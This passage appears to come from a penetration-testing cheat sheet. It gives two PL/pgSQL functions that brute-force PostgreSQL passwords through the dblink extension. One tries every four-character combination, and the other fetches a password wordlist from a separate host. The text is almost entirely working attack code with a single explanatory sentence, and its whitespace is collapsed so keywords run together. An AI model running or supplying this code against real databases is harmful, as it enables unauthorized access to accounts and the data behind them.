//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('', '5432', 'postgres', 'postgres');
Note that even brute-forcing 4 characters may take several minutes.
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('', '5432', 'postgres', 'postgres');